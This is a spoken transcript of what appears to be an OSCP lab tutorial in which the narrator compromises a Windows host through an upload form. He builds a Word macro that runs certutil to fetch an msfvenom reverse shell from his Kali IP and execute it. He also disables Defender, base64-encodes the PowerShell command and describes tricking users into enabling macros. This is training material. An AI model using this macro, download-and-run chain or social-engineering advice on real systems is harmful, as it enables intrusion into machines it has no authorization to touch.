Hello everyone and welcome to another Active Directory practice set for your OSCP. Today what we're going to go through is a more moderately difficult or more complex scenario. So in this case, I think what we're going to try and put together is something that is going beyond the basics and is going to be one that, as you've gotten comfortable with some of the rudimentary or basic skill sets and flows, you're going to now be able to do some of these more advanced things. So let's kick things off by going to our, let's not go back, by going to our OpenVPN server, and let's download our VPN profile and get connected, so that way we can start enumerating and getting connected. So let's go ahead and create a new directory on our desktop. We'll call it AD. In this case, actually, we'll call it, well, yeah, we'll just call it AD. And let's go ahead and create some more directories. So let's create one for VPN, MS01, MS02, and DC01. And for my sake, I like to stay organized, so I'm going to go ahead and move the OpenVPN file to our VPN folder and initiate the VPN connection. Again, depending upon how you build out your environment, you may have the OpenVPN set up, or you may decide to opt out and just have your Kali box directly connected to your outside subnet. In my case, I am running Kali locally on my machine and running OpenVPN and all the other virtual machines on my ESXi box. So hence now I'm connected in. I have my 172.16.11.11 address, and ideally we should be routing into the 192.168.100 and able to access MS01, or at least be able to start enumerating it. So let's give it a shot. So the first thing we're of course going to do is start determining what we actually have open on our victims. So let's go ahead and again, we'll typically create a folder for enumeration, one for files, loot, exploits, and then I'll usually have some files in here for creds, users, passwords, hashes, and let's kick off our NMAP scan. So I always like to start off with gold NMAP. We don't need to ping. Let's go ahead and be verbose. And let's pick on all 65,535 ports. But let's do it quickly. So we're going to go ahead and go against our target of 192.168.100.201, which again we can see is right here. And we're going to output this. So I'm good with the good old NMAP format. That's fine. Let's drop it into enu nmap-ports.log. And sure enough, we start to see that we've at least got a couple ports open. It looks like some web services. And what's the first thing that we want to do when we start seeing web services open? Start running GoBuster, or whatever your WFuzz, whatever your preference is for enumeration there. So I'll split this vertically. Let's get this running concurrently. So again, go back to my folder. Let's run GoBuster. I'll be GoBuster, and we're going to run a dir command, give it the URL, which in this case will be, let's just run it on port 80. So it'll be 192.168.100.201, and cursor, let's run a word list of user share. Again, I always start with common. If I get some hits from there, great, but if not, then we can go to some larger ones. So derby common. And let's log this to, so we'll use T to split the output so we get it in our console, but we're also going to save it to a text file. So we'll save that to enu gobuster port 80.log. Right off the bat, we see we're getting some hits. So what I like to do is I'll come back here and just say grep for, well, we'll invert and say I'm going to ignore the 403. So everything but 403 against our GoBuster log. So now I can easily or quickly focus, and you could also do the opposite and say maybe don't do a -v, but just do grep 200, so you can just see what comes back as a status 200. But in this case, we can also see that there's a 503 for examples. So two ways to do it: either look for what you want to specifically look for, status 200, or grep out, remove all the 403s or all the codes that you don't want to see. So index HTML, awesome. The uploads is, I don't think a default, index we expect everywhere, but uploads, that's new. Okay, that's not typically default. I'm already interested in that. And here we can see our NMAP scan finished, and we didn't get anything else, just 80 and 443. So this host is pretty locked down. There's not much going on here that's publicly accessible. So let's update our NMAP scan. Let's just do a quick version scan. So I'll just call this versions, and we're going to change our ports to 80, 443, and let's add some SVN, so version scanning and common scripts, or actually VC, I'm sorry. And let's run that and see what versions of software we come back with. And while we're doing that, we should definitely also open up our notes and start putting some notes down. So I always like to start with something like my hosts. So we have 192.168.100.201, and that is MS01. Again, if you looked in your control panel that you'd have access to, you'd be able to see the addresses that you're supposed to submit hashes for the other machines. So you'd also be able to determine, similarly by looking at the diagram here, that we also have 10.10.1.200, and that we also have 10.10.1.202. Now, you could make assumptions like, hey, 202 versus 201, this is probably MS01, this is probably MS02, this is probably a DC based on the numbering scheme if you've worked in networking a lot, or based on some practice labs you might have already done. However, let's just work on the assumption that we don't know what they are, other than we know that our initial box is going to be dual homed, because that's obviously our only way to get to the inside subnet. So let's go ahead. It's just kind of a logical, way of analyzing what you're against and what your options are. So when we go back here, we can see that sure enough, 80 is running Apache. Looks like 2458 and 2458. So some of the first things that we would want to do is start documenting all of this, right? So we'll grab this, copy it, and we could say ports or services, and we're going to document that 192.168.100.201 has TCP, so we could say 80/TCP open. That is, essentially running our Apache server, and we did find that it has an uploadster. There are other ways you could list this, but so far, since we only found an uploads directory, it's the only one I'm really interested in. If we want to be a little bit more Let's go ahead and clear this out actually. Again, go a little bit deeper. We could say, I think it's big is the other one that they have in here. So instead of common, next one I would jump to typically would be big.text. Let's see if that gets us anything different. And so we're noticing that this is the same server, and when we look at the HTTP server header and we look at the methods and the title, okay, file upload form, that's interesting. That immediately tells us we're potentially looking at something where we can upload files or interact or have some kind of web attacks. So I would also add this in. As we have this file upload form title. I guess you could also organize this by saying dir uploads. So same thing here. Let's go ahead and grep. And we don't get any difference. We still get uploads and examples, but 503 for examples. So I'm feeling pretty confident that we have an file upload form, and we also have an uploads directory. This is smelling or starting to sniff out like it's going to be something where we upload a file potentially. Let's go start, before we do that, let's look at the source code. So let's do a curl. And again, one thing I just started to enumerate is we have the same HTTP title. So it would make sense to go ahead and run this against, let's clear this again, against port 443. But I'm already starting to feel like this is going to be the same server and web service hosted on two different ports. We're just offering 80 and 443. But to confirm that, let's go ahead and run the same commands, and I'll just start with big since that's got more in it. We'll say port 443. Whoops. And we'll change this to, actually I don't need the port, we'll just say HTTPS. Oh, and of course we've got a certificate error, so we need to tell it to ignore the cert. One of the ways you can do this is by saying go buster -help -help, and then here it gives you the options for dir. So what we would then want to say is how about dir help, and that gives us more options in here. We're specifically looking for how do I ignore certificates, and I already see it actually here. It's no TLS validation or -k. But if you weren't so sure, another way that you could find that is by grepping. So just run the same thing, grep for, let's say, ignore case certificate, or about just cert. And sure enough, there you can see -k, no TLS validation. So we'll go ahead and run our command again. But we're going to add in the flag for -k, and now we'll see, yep, it's running, and it ignored the self-signed certificate. We can see it's self-signed when we look at it over here. So now that that's running, let's go back to doing curl on 192.168.100.201. Oh, okay. So right off the bat, let's see if we notice anything. So it's not, we have our title, which we saw earlier. We've got our body information here. It's not anything extravagant, very straightforward, but this is lining up with our uploads directory that we saw earlier. This is a file upload form. Okay, it's referencing a PHP file, so we definitely want to check that out. And it looks like it's accepting .doc files. Okay, Word files. This immediately tells me that we're looking at something where we're potentially uploading files, maybe some client-side exploit if it's not a web attack, because we can do something with the .doc files if we need to. And let's check out that PHP file. Let's see if that exists too. So that one is upload.php. Oh, and we don't have access to that one. Okay. But that definitely tells us that this is a good sign of a attack path. So what I would do is I would typically start with, well, let's actually document this down, right? So we've got an uploads directory. We also index.html equals that file upload form, and that file upload form, it looks like it uploads .docx or .doc files, not .docx. Oh, so that's another good point actually. So the newer versions of Office have that X extension or X letter in the extension, which can prove problematic for your OSCP client-side exploits. When I see a .doc, that tells me that it's the older legacy, if you will, Office version, which we have the ability to do more client-side exploitation because it doesn't have as much safety. And I've also noticed that it's an immediate indicator of that being a more likely attack vector when it comes to the OSCP. If you go through the Pen 200 course, you'll find that there is content around client-side exploitation. And if you're not catching on to what I'm putting down, this seems like, and this is where we're going to write down things to try. So things to try, we'll call this the to try. So typically I would go through some web attacks against the upload web page. But right off the bat, I'm also thinking maybe I want to try client-side exploitation. So client-side exploitation with, go with me, what are you thinking? We're thinking Office macros. Because that is definitely in the content of our Pen 200 course and within the realm of what we'd be expected to know when it comes to the OSCP. So let's do some quick validation and see if this is actually a potential offering. How are we going to do that? Well, let's see if we can upload different things. And again, this would also be something that you would abuse and try for your web attacks, right? What can you do to bypass some of the client-side controls that might exist in this PHP file, but we can't see it, so we don't really know what those, that'd be blind, because we don't know what those what the server-side, I should say, server-side filtering is, but we could also bypassing the client-side filtering, which is in this HTML that's saying we only accept these .doc files. So without further ado, let's get into it and try some stuff. So I'm going to go into exploits, and let's go ahead and touch test1.text, touch test2.doc. And let's see if we can upload either one of these. We'll go ahead and actually echo, this is a test1. Let's put that into test1. And let's echo, this is test2 into test2. And let's bring up Firefox. Let's browse to our server, so 192.168.100.201, good old MS01. There is our file upload form. And sure enough, it says, please select the .doc file. So let's pick something out. So here we've got AD, MS01, exploits. Can we change this? Oh, we can. So we can pick all files. Let's try .text file and see what happens. Actually, before that, we have a pretty good idea we know where this is going to go, right? So we have a feeling like this is going to go back to that uploads directory. Ooh, and we do have view access, so, and there's nothing in there. So that's another important thing. We should have checked this maybe earlier. As soon as we saw that directory, we should have navigated here, grepped it, curled it, well, not grepped it, but curled it, done something to see if there's any listings, because potentially there could have been files of interest here, but there's not. So let's see if we can create one. Let's upload our test1.txt. Ooh, okay. Only .doc files are allowed. Sorry, your file was not uploaded. And if we go back here and refresh, yep, it's not there. So let's try this again. We'll go ahead and go back, refresh, and in this case now let's pick our .doc file. Let's see if it's looking for the file header or if it's just going to go based on file extension. Ooh, okay. So it's not going by the magic bytes in the file header, because obviously this file wouldn't have it because it wasn't created legitimately with Office. It's just a text file, but it did say it uploaded it, and sure enough, there it is. And can we re-download it? We can. And let's see if it was changed or if it's still the same file. Okay, let's go ahead and clear this. We don't need that for now. And on this side, let's go ahead and cat, or better yet, yeah, let's do cat test2, and then let's cat downloads test2. They look the same. Do a diff on test2 and downloads test2. No difference. So they're exactly the same. So this tells me that it's not looking for magic bytes. So there are some other web exploits that we could possibly take advantage of, but this feels like a client-side exploit, considering it's really limiting us to this .doc file. So with that being said, and for the sake of keeping the video relatively short, we're going to jump ahead. I would highly recommend go through the basics of your web application testing, especially reviewing the material in the Pen 200 course, and go against this web server to make sure that there's, you know, no IDORs or any other types of vulnerabilities that you could take advantage of. But for the sake of time, I'm going to jump ahead into what I suspect this is, which is client-side exploitation with potentially Word macros, Office macros. So to do that, though, we're going to actually have to, and let's go ahead and clear this, we're going to actually have to get a, you know what, we're done with this one, so I'm just going to go ahead and exit this. We're going to need to get an Office application going. So we're going to need a Windows machine. Now, I do not know if when you take this exam, whoops, I guess we're not going to save that. When we take this exam, actually, yeah, let's go ahead and save that. Let's save it to our desktop AD, and we'll just call this notes. So I do not know if they give you a Windows machine, if there's the expectation for client-side exploits, or if you need to be able to provide it yourself. So what I would do is, obviously you're going to be running your Kali machine or whatever attack box that you want locally, much like how I'm running my Kali machine locally on a MacBook right now. The expectation is that you may also have to have a Windows box at the ready. So I do. I have a Windows box at the ready. I've got it started here, and or at least I did have it started. And if we get it going again, let's go ahead and get logged in. And I believe I have a ISO mounted for Office, so we can install Office. Again, you shouldn't need a paid version. You should be able to get away with whatever you need with a fresh install of Windows and a fresh install from Office. You can go download a lot of these Office ISOs from MSDN, or there's actually some GitHubs. I don't know that I should specify any specific ones, but I'm sure if you Google for Office ISO GitHub, you'll probably find some results there where you can download these and then compare the hashes against the MSDN library if you want to make sure that they're legit, or verify the URL. The URL where the download comes from may also be the Microsoft Developer Network, or MSDN. So here you can see automatically started the install. I believe this is Office 2019. I'm trying to go with one of the newer versions. So once that finishes install, we'll go ahead and pick things back up. But for now, I'm going to go ahead and pause it and let it finish. Okay, let's check back in and see if, yep, it is all finished installing. So let's go ahead and run Word. Shouldn't be too difficult for us to create what we need and test this out relatively quickly. Once you know what you're doing, and you've done this a couple times for practice, which is why we're here doing this, it gets much easier. So right off the bat, as well as you should keep this in your short notes of reference material. So we don't need a product key. It'll pop up and ask, of course, and you can say I don't sign in. I'm just going to close it. And then it's going to ask you to accept, and it'll say, hey, you can use this for, I think it's like 5 days. And that's fine. We only need it for, you get 24 hours for your exam. So maybe install it the night before or the day before to make sure you're good to go. And 48 hours should give you plenty of time. No, I'm not going to send optional data, blah, blah, blah. Okay, so now we've got Office installed. Let's go ahead and open up a blank document. And let's close the warning. Let's go ahead and this is a dummy doc for a robot victim, because we know we're going against the OSCP exam and there's not an actual end user. If this was a real pen test, obviously you would not use this Word document. You would use a more legit looking one, or have some content in here, or have maybe an error message that says, something along the lines of document failed to load, please download again, and you can get them going in a loop where they keep on downloading the same thing and re-exploiting themselves. So what we do need to do, though, is we want to go over here to View and Macros, and we're going to change this. So all documents, no, we want to just look at the macros that are in document 1, the one that we have open here. Actually, no, before that, let's go ahead and save this. So desktop's fine, and we'll call this about test 1, and we're going to change. Again, one thing we want to make sure is it's at .doc, not docx. Since this is Office 2019, Word document's going to end in a .docx. We want to choose the Word 97 to 03. Same thing goes if you're using Excel or any other. Pick the 97 to 03. And we don't need an author. We can delete that. Don't want to leave any trails of who might have made this. If we had a user, then maybe we could put the user's name in here to spoof that user. So this should be all we need. Let's go ahead and save that. Now let's go to macros, and we'll see it's called test 1 document. Create a new macro. Oh, let's give it a name actually. So we'll call this about rev shell 1. Rev shell 1. Because again, we're not going against a human, so we don't need to be too protective or obscure. It just makes it easier for us. So here's our sub rev shell 1. And what we're going to want to do here is to start to call out certain commands to build this out. So one thing is I remember right off the bat there's a couple of subroutines that we want to call out. One is auto open. And you'll see when you hit enter, it automatically adds the end sub. And then here, what we can do is we're going to call out the command that we're going to run. We're going to call out rev shell 1. Oh, that's funny. Actually, the L's and the 1 look so similar, but that is LL and the number 1. You can obviously call your macro whatever you want. And then the other subroutine that we want to call out is sub document open, document underscore open. These basically both do the same thing. I can't remember the exact difference between the two, but as long as you have both of these subroutines called out and referencing your subroutine of rev shell or whatever macro that you want to put together, this will cover it. And the intention here is that when the file is opened, or the document is opened, either case, when the user opens this document, we're going to run a macro automatically. Now again, If there's certain client-side protections in place, like most protections are nowadays, they're going to block the macro and require the user to enable it. So oftentimes, if you're dealing with an actual end user, you'll want to put some warning or some message inside the body of the Word document that says, "Hey, click here to properly download the rest of the data," or "Data corrupt. Click macros to view the data." But you need to do something to trick the end user into enabling the macro. For the OSCP, not the case. As far as I understand it, a lot of the user behavior is automated, so you shouldn't have to spoof any robots. Let's go ahead and build out our routine. So right off the bat, we're going to need to declare a variable. So dim to declare our variable, and we'll just call this about. No, I'm not going to be too. We'll call this one, it's going to be about p shell command. It's PowerShell command as a string. So we're going to call this out as a string, right? So p shell command is a string variable. What's it going to equal? Well, p shell is going to equal, and here's where we need to put in our code. Okay, so we'll put that as a placeholder with quotes because we need to come back to that. And then after we have our PowerShell command, we're going to say create object. And if you're not familiar, this is, I believe, Visual Basic for Applications, VBA. Oh yeah, duh, it says it right up here. Microsoft Visual Basic for Applications. So if you need to look up the command syntax, please do. I always keep a copy of something like this in my cheat sheet so I can go back and reference it, instead of trying to remember or reinvent the wheel every time I run into this situation. So create object, and what are we going to create? Well, we need to use wscript to generate a shell. So that's where that command comes in. And what are we going to do with it? We're going to run it. What are we running? We're going to run our command, the p shell cmd. So let's just go ahead and test this with we can save it, and let's just do a quick run. Oh, invalid procedure. Okay. So it does not like our command. So create object, wscript.shell. We're running our string. Oh, it's because our pshell command probably doesn't have anything in it. So let's say PowerShell.exe. I should actually change this. It's really a command prompt command. So let's just call this cmd string. Better yet, string cmd. Oops, cancel. Copy, paste, paste. Yes, okay, there we go. So now string cmd variable equals PowerShell.exe, and we'll just say, in this case, how about, who am I? Or actually, let's just generate a PowerShell window. So save it, run it. Okay, that works. Fantastic. So that's how you would just test out to make sure, hey, do I have something that's going to work when I run the macro? So now that we tested that the macro works, what I would like to do is test that the subroutines work. So ideally, we should be able to close this, close our Word document, and then just double-click and reopen it. And if this works properly, of course, once we back out of there, and there's our macro warning. Let's go ahead and say enable content, and boom. Well, as soon as we enable the content, then here we go. It opens up. Now, if you want to change this and emulate what the end user should probably be seeing, or what I would expect to see, we would go into File, Options, and Trust Center Settings, and say Enable All Macros. And say OK. And OK. So at that point, when we open it up, it should automatically open without us even being prompted, which is what I would expect. Yep, sure enough, there it is. Again, what I would expect for the OSCP exam for this type of an attack vector. So otherwise, again, it'd have a user and they would have to click on the enable macro button, which just wouldn't typically be a part of what I would expect for you to have to spoof or for you to have to create. So now that we've got that going, the last thing we need to do is actually generate some type of a reverse shell. You know why we called it this. So let's go back and edit our macro. And now we're going to replace this. One of my favorite places to go and generate these types of shells is out on the interwebs. So I believe this is connected. Let's go ahead and do in private. And it's revshells.com, if I can spell. And if this doesn't work, then what we can do is go over to our Kali box, which does have internet. I don't remember if I set up the Windows machine to have internet or not. And similarly, go to our good old revshells.com. And here we go. So if you've never used this before, definitely bookmark it. This place is fantastic. So our address is 172.16.11.11. We want to generate a reverse shell to go back to that. So the first thing we need to do is change the IP to our IP, 172.16.11.11. And what port do we want to come back on? Well, we know that this server has port 443 open, so let's go ahead and use that. I like to spoof that one as well, because it's, even if the client firewall is on, outbound 80 and 443 traffic is typically allowed. So let's use that. If you're not familiar, again, the listener portion, this is what we were going to set up on Kali. So well, actually, let's go ahead and do that now, right? So we'll go back over to our Kali box, which we're currently on, duh. And we'll go ahead and go here and we'll say clear netcat dash lvnp. So listen, no name lookups, verbose, and port 443. All right, we're listening. And down here is going to be the code that we want to generate. Now, this is a Windows machine, so let's go ahead and pick Windows. It doesn't have netcat on there unless we put it on there. So let's scroll down. There should be some for PowerShell. And there we go. So PowerShell 1 has all of this awesome text in here. The problem with this, and this would actually most likely work for us because you'll notice it uses a lot of the .NET commands, and so this would likely work. However, the problem with it is it's got all these syntax items in here, like $signs for variables, quotation marks, all of these things that could break. So it looks like PowerShell 2, similarly, I like it, but it still has some things that might break. PowerShell 3 looks good, but again, has a lot of items in here that may break. So when we get down to it, PowerShell number 3, but in base 64, is one of my favorite go-tos because it basically says run PowerShell, and here's an encoded command that has the same thing as PowerShell 3. So it's got all this in here. It's PowerShell. Well, actually, it's missing the no profile and the hidden window, but it does have the EP bypass. Nope, just encoded actually. So it's missing all of those. So we're going to add those in. But the big thing is it has this whole command, but encoded in base 64. So we don't have to worry about any of these fancy characters breaking in translation or breaking on interpretation. So this is a fantastic item to use in a macro or in a lot of other cases too, where especially web applications where things may get translated differently or interpreted differently based upon those characters. So let's take this, but let's tweak it a little bit. So what we'll do is we'll just say copy, and we'll go back over here to, let's see if we can copy and paste directly back and forth. Might have to go to my host machine first. See if we can paste this in. Nope, sure enough, it worked. So there's our command. It's obviously very long. So this is another thing where it may break. We may have to chunk this up into more bite-sized pieces. if it doesn't work. Now there's another way to do this as well, which is using the built-in Windows utility and not trying to encode this in one long command. So there's two ways to do it, but this is the quickest, the easiest. Let's try this first. If it doesn't work, then I'm going to fall back on my more fail-safe mechanism, living off the land. So what we're going to do is we're just going to add in a couple things. We're going to say NMAP for no profile. Oops. Oh, okay, so it's not liking this. Hold on. Let's undo. Paste that in. Quote. Okay, yep, so this is where it's going to start erroring out. It does not like how long this is. And it won't let me add another quote in. Okay, so a couple ways to do this. One, you could break this up, and if you know Python, or if you bash it out, or just want to manually break it up, you could do that. Otherwise, there's one other quick and easy mechanism that I keep in my back pocket as well, just to deal with situations like this. I'm going to show you that way, and you can determine if it's your preferred way. But either way, the other way you could do this is you could say string command equals, actually I'll probably have to do this in Notepad. So you could potentially say stir cmd equals stir cmd plus, and then the commands that you want to run. So you could paste this in, and let's say break it off here. So what I would do then is go down here, copy that, delete, come down here and say same thing, stir cmd equals stir cmd plus that. Come back here, copy, delete, and quote, and then basically keep doing that until you get this down to a much more bite-sized chunk. And so you could, in that case, basically keep doing that until it finally gets down to something that is a list of probably 10, 12, 13 of these add-ons. So you're basically saying take this and then add on this and then add on this. So you keep on appending to get the full string in the long run. You can script that out, which is the way I would recommend doing it, or you can try a different mechanism. But to test it out, I will start with just the plain syntax. So the plain non-encoded syntax, because you can probably do this. Yeah, I'm pretty sure that you can do this without needing to encode it. So let's go ahead and say what we want it to do, which is going to be certutil.exe. If you're familiar with that utility, you know that it not only manages certificates, but it also can be used and abused to download things. So we would say certutil-f-url cache, and then HTTP in our Kali box. So 172.11.11, and let's download the binary shell that we're going to have to build. So this is a command to pull this down, and then after that we will run it. So I guess technically this is actually going to be two commands. So first we'll say download, let's say rev, I'll say winrev443.exe, and save it to let's say, well, the current directory actually. So winrev443.exe. And after that, we're going to have another command. So dim stir cmd 2 as string. And I'm going to move that. So cut, paste, And then what are we going to do with that? We are going to do another create object. And run it against string command 2. But first we're going to declare what string command 2 is. That is going to be really simple. It's just going to be winrev443.exe. Just run it. So basically the first command is going to download it, and the second command is going to run it. We could combine these into one command, but for the sake of just kind of splitting things apart, being able to identify what's working, what's not working, I will typically start here. Oops, let's get rid of that. So this theoretically should work. We shouldn't even have to encode this. This is nothing that's too long. And if we want, what we can do is save it and test it by running it. Now, I don't believe my Windows box is obviously going to be able to reach out to this. However, it should try. Oh, malicious macro detected. Oh no. Oh, and it killed it. That wasn't very nice. That wasn't nice at all. All right, let's go ahead and say okay. This might be Defender oriented. I actually have not ran into this just yet, so let's see if we can turn that off. I'm going to bet that it's Defender. Details, yes. Yeah, so it's Defender that's picking it up. So what we can do is we'll just say allow on the device, leave me alone. But then let's also just turn this off. Real-time protection off. Stop getting in my way. Okay, so now, theoretically, no, don't start in safe mode. There we go. See? Oh, method run of object failed. That's probably most likely the second command that we're trying to run. Yep, sure enough, because it didn't reach out and find winrev, so therefore it can't run it because it doesn't know where it is. So I think we are in good shape. I guess what I should say here actually is cmd.exe/c. Let's try that. Run. Well, actually, you know what? PowerShell. Let's stay on the PowerShell train. We've already been using that, so let's just say PowerShell -nop for no profile, -w. Actually, we're not going to hide this one. And -c for the command. In this case, because it's PowerShell, we'll have to do // to say current directory. So save, run. Okay, and I'm sure this is probably because the file doesn't exist. If we were to change this to say about dir, oh, no, does not like that either. Okay. Well, let's test this out, though. This seems like this should work. So let's deliver it. So we're going to go ahead and close it. And that's fine. Stop the debugger. Close that. Let's copy. Let's go back over to our Kali box. Let's go ahead and go to our desktop. And MS01 exploits, drop in the actual test1.doc, and we can go ahead and remove our test files we were playing with earlier. And at this point, we should be able to try uploading it and catching a shell. So let's go ahead and shrink this guy down a little bit. Go to our HTTP 192.168.201. Let's get our reverse shell open and sitting on the right side so we can watch it. Oh, and actually, we need to build our binary. Duh, we forgot to do that. So, and serve it up, no less. So let's go back to our desktop MS01 folder, exploits. We're going to have to say MSF Venom. In this case, it's going to be payload of Windows x64 shell reverse TCP lhost equals 172.16.11.11 ourself. L port equals 443. Format's going to be exe, and output will be winrev443.exe. Let's see if I got that right. Sure enough. And now we can go ahead and run Python HTTP server on port 80. Oops. -d current directory and port 80. There we go. All right, let's see if the first command runs where it downloads it, and then the second command runs where it actually runs the payload and gets us a reverse shell. Fingers crossed. Here we go. Upload. File's been uploaded. And now all we can do is sit here and wait for the user to open it. So instead of sitting here and waiting, and again on the OSCP, I'll pause this, but on the OSCP, expect everything to run within, I think the rule of thumb is a 10-minute interval. For client-side exploits and things like this, I would expect it to run probably like every 5 minutes or so, maybe less. But if you have dropped a payload and you're playing the waiting game for user interaction or something to happen on the back end, for the OSCP, it should happen within 10 minutes. If you've waited 15 minutes, work on something else, try again, do something else that you did not get the result that you were looking for if you've waited 15 or even 20 minutes and not gotten a reverse shell or a shell or payload or execution. So with that, I'm going to go ahead and pause it and let's see if we're lucky. And sure enough, we got lucky. We got very lucky. So we can see here in our web logs from our Python web server that we actually had, looks like 2 requests. Oftentimes you'll see these come through twice. But looking at the timestamps here, you can see one was at 11:48, the other one was 11:49. So sure enough, we got some hits, and it looks like it downloaded the payload. You can see the code 200. And if we go over to our other tab where we had our listener, sure enough, look at this. We get a reverse shell, guys. We have access to MS01. Look at that. This worked. This was a successful exploit. So we are now landed on MS01 as Kevin. And Kevin, who are you? So I'll typically say, who am I /all. Give me all the datas, all the good stuff. Let's clear that. Actually, I guess we can't clear since we're on a shell there. But we go do that. Who am I /all. Here is all the data on Kevin. So Kevin is a local user on MS01. Here's our SID. And looks like 1002. Probably not the only user on here. Not part of any special groups. Those are all pretty much well-known defaults. No real special privileges, but we do have the ability to shut down. So, okay, that if we need to reboot services or something for privilege escalation, that is something to note. And we don't have any user claims or no Kerberos since we're a local user. So, not a lot going on here, but guess what? We have access. We are on MS01. We're now ready to start hunting. So let's go ahead and clear that a little bit. Let's go ahead and minimize that. Minimize that. Let's open up our notes and let's update. So, success. Word macro exploit successfully downloaded reverse downloaded and executed rev shell. Beautiful, beautiful. So now I will go ahead and take this, and I will actually move this into attack path. So I start to keep track of what was the path of success, or how was the path to compromise. Against MS01 uploaded via web server. Okay, so we've got some updated notes now. Now we're ready to start enumerating MS01, because we're sitting on there as a local user. Actually, so before we enumerate MS01, I guess I want to back up. There's a couple of other ways that we could also attack this. This was the most simplistic way, with being able to put this in there as 2 commands. I always do that to make sure that things will work successfully, and also for troubleshooting in case maybe the payload downloaded but it didn't execute. So I'm going to give you 2 more options, 2 more ways that you could simplify, well, not simplify this, but you could also attack it. There's way more than just these 3 ways to do it, but I give you a couple more tools, and again, this is a little bit more moderately advanced, so let's cover some better stuff. So let's go ahead, and we got this working, but I'm going to go ahead and exit. And let's go ahead, actually, shoot, you know what? We should probably go and delete that Word document, because otherwise it's just going to keep on executing it. So let's get our listener back up and wait for it to call back home, which could happen anytime. I will probably just pause it and we'll come back when it executes. Okay, so it executed again and we're back on. So let's go ahead and take a look here. You can see there's our payload, there's our test file. Let's go ahead and delete both. So let's go ahead and delete star.txt or .doc and star.winrev. Actually, star.exe. Oh, it won't let me delete that. Oh, that's interesting. How about winrev443.exe? Oh, okay. So apparently it won't let us do that, but that's fine. So what we can test here is we'll go ahead and exit out, clear that. Since the Word doc is gone, we know that that won't execute, so we can start our listener. Actually, let's go ahead and clear, start our listener. Let's go back to our Windows machine, and we're going to change a couple things here. So open up our Word doc. You can see it tries to run the command, and there's our activation warning, blah, blah, blah. Let's go back to our macro. Rev shell 1, say edit. And in here, what we're going to do is change this. So we can comment out the string cmd2 and this create object. So we don't need those 3 commands. Arguably, you can also just delete them, actually. So I'm just going to do that for the sake of keeping things clean and easy. What you can add on here is there is a break that you can use, which I believe is the semicolon for PowerShell, to say, do this command, but then also do this next command. So theoretically, what this should do is combine our 2 commands together and run them as one fell swoop. So what we're going to do, and if this doesn't work, there is another option, because I'm not sure 100% if this will execute, but I believe it will. So here we would say /winrev443. So we're kind of combining these 2 together. So let's go ahead and save it and run it. Nope, and I don't think that actually worked because otherwise it would have showed that window longer. So let me double check. Save it, run it. Nope, okay. It's pretty quick either way. So just for giggles, save it. No, you know what, actually, pause. Oh, it doesn't even like that. Okay. Well, let's see what happens here. Go ahead and close, copy, and let's go ahead and we will rename this to test1 text 2 commands. This one we'll paste in here. Oh. Copy. Paste. So this one we'll call test1 text 1 command. We've got our listener going. Let's go ahead and go back to our web browser, back to here, browse text1 or text1 CMD, upload. All right, it's been uploaded. We've got to get our listener going here again, so let's clear. And so we've got our listener on this tab. Actually, let's go ahead and see if we can split this. Give me a hard time. All right. And now we just need to wait. Okay, that did not look like it's successful. So let's try this differently. And this is why I go to show you some of my failures, as well as some of the failures that you might go through, so you can learn from them, find out why, and then adjust accordingly. So let's go ahead and edit our rev shell again. Whoops, edit. And let's go ahead and take this out. Actually, I think what we want to try now is PowerShell.exe -no profile -c. And then let's see if we can put this in quotes. So let's see if that works. Looks like it tried. Now, if I change this to pause, will that work? I don't think pause is in PowerShell, actually. Oh, it does. Okay, so it is in PowerShell. So worst case, here's what we're going to do. We're going to, instead of troubleshooting all of this, what if we just encoded it into one command? That would be ideal. So there is a way to do this natively in PowerShell, and that's the way that we're going to use it. I'm sure there's plenty of other ways that you can base 64 encode things. However, this is the one that I've had the most success with. So let's go and open up PowerShell again. And in this case, what we're going to do is let's go ahead. Actually, you know what? Let's change this defaults. Well, properties, font 20. Okay. So what we're going to do is we're going to say convert do base 64, not character array, but string. And what are we going to convert? It's going to be system.text.encoding. And that's going to be Unicode, get bytes. And that's going to be our certutil command. So we'll go ahead and take our certutil download command. Actually, you know what? Let's just take the whole thing. That's the benefit here, is we should be able to combine our multiple commands into one string. So if we dump that in, close it, and then let's see, we've got one bracket to close, or one bracket to close, and then we have a second bracket to close. Sure enough, that worked, and there is our base 64 string to accomplish all of that. So let's copy that, and you'll notice it's actually much shorter than this command that we have here from rev shells, because we're not doing all the extra complicated components that's in the script there. This one's only that long, which might not break our macro here, so we might not have to split it. Let's find out. So instead of a normal command, this is going to be an encoded command, so we have to do -e, and then we're going to paste this in like that, and then click somewhere else. Oh, sure enough, yeah. If you can paste that in and then click anywhere else, move your cursor, and it doesn't give you an error, that means it's not too long, as far as I can tell. So we've got our no op. We would technically probably want the window to be hidden, but for the sake of troubleshooting, we've been keeping that open. So, but that's another option to add in there if you want to hide the window. So let's save that. Let's run it, see if, yep, it looks like we had a quick a little cert util message there. So this looks good, like it might actually do both commands. So let's go ahead and close it. Copy it. And you're going to guess it, paste it. And we'll call this one test1. Oops. Underscore B64 1 CMD. So it's base 64 encoded, one command. And let's give that a shot. So now we'll go back, we'll say upload. And then now, once again, cross your fingers, and hopefully this will work. Again, I'll pause the recording and we'll come back here in a few minutes after it has either succeeded or failed. Ooh, and just like magic, that worked. So here you can see return code 200. We gave it the reverse shell payload. It most likely overwrote. Let's double check here. Yep, it overwrote it, and sure enough, you can see we got our reverse shell, and this was all through our base 64 encoded and combined two commands of the certutil to download it, as well as the second command to run the winrev 443. So it just goes to show, try things in steps and stages so that you can identify when and where things broke down. What I could do is I could create it with separate commands and run them separately, one to download it and one to execute it. But when I tried to combine them together without encoding, so keeping it in plain text, it didn't work. However, take that same command, encode it in base 64, and sure enough, then it runs it and executes the command just fine. No changes, just base 64 encoded. So it goes to show, try things multiple ways. Also, try and break it into different steps. So that way you can figure out, is this successful? Is it not successful? What do you need to change? What worked? What didn't work? And you can troubleshoot a lot easier. So now that we've gotten a reverse shell on there again, we'll go ahead and move forward with our enumeration. I just wanted to call that out, as this is one of the ways that you want to think about approaching and attacking your OSCP exam and your Active Directory set. So if you're familiar at all with some of my methodology, you're going to immediately be like, well, what should we do next? Well, I mean, we can do some manual enumeration, and I'm a big fan of manual enumeration, but I'm also a big fan of making my life easier. So I'm going to go and grab winPEAS, transfer that over, and run that. Actually, we'll go back here to PEAS, releases, and here's our built binaries. We'll grab the x64, and then you'll see we need to move it over. So we'll say, actually, I'll create another folder called staging, or how about just stage? And let's move winPEAS there. And then let's go ahead and run our Python web server. And let's download our winPEAS and run it. So again, what we can do here is I'll actually typically move into the C drive users. Oh, okay, and immediately we can see there's, so we are Kevin, if I remember correctly, but there's also a Stuart user. Can we see into Stuart's profile? No, but that might be something to immediately note. Again, we 